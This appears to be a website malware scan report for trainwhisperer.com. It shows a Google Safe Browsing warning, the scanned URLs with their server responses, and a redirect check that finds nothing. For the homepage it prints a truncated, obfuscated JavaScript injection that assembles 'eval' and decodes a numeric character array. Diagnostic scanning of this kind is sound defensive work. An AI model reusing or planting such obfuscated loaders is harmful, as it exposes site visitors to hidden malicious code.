Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trainwhisperer.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.trainwhisperer.com/ | 200 OK Content-Length: 5892 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,118,121,98,111,108,31,59,29,100,110,97,114,109,100,108,113,46,98,112,98,97,115,99,66,108,100,107,98,110,115,38,36,105,101,112,94,109,100,37,38,59,12,8,10,10,31,30,29,32,117,120,97,114,107,44,112,114,98,30,58,32,38,102,113,11 Antivirus reports:
| ||
http://www.trainwhisperer.com/../McCall.xls | 400 Bad Request Content-Length: 417 Content-Type: text/html | clean |
http://www.trainwhisperer.com/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trainwhisperer.com
Result:
GET / HTTP/1.1
Host: trainwhisperer.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: trainwhisperer.com
Referer: http://www.google.com/search?q=trainwhisperer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trainwhisperer.com
Referer: http://www.google.com/search?q=trainwhisperer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.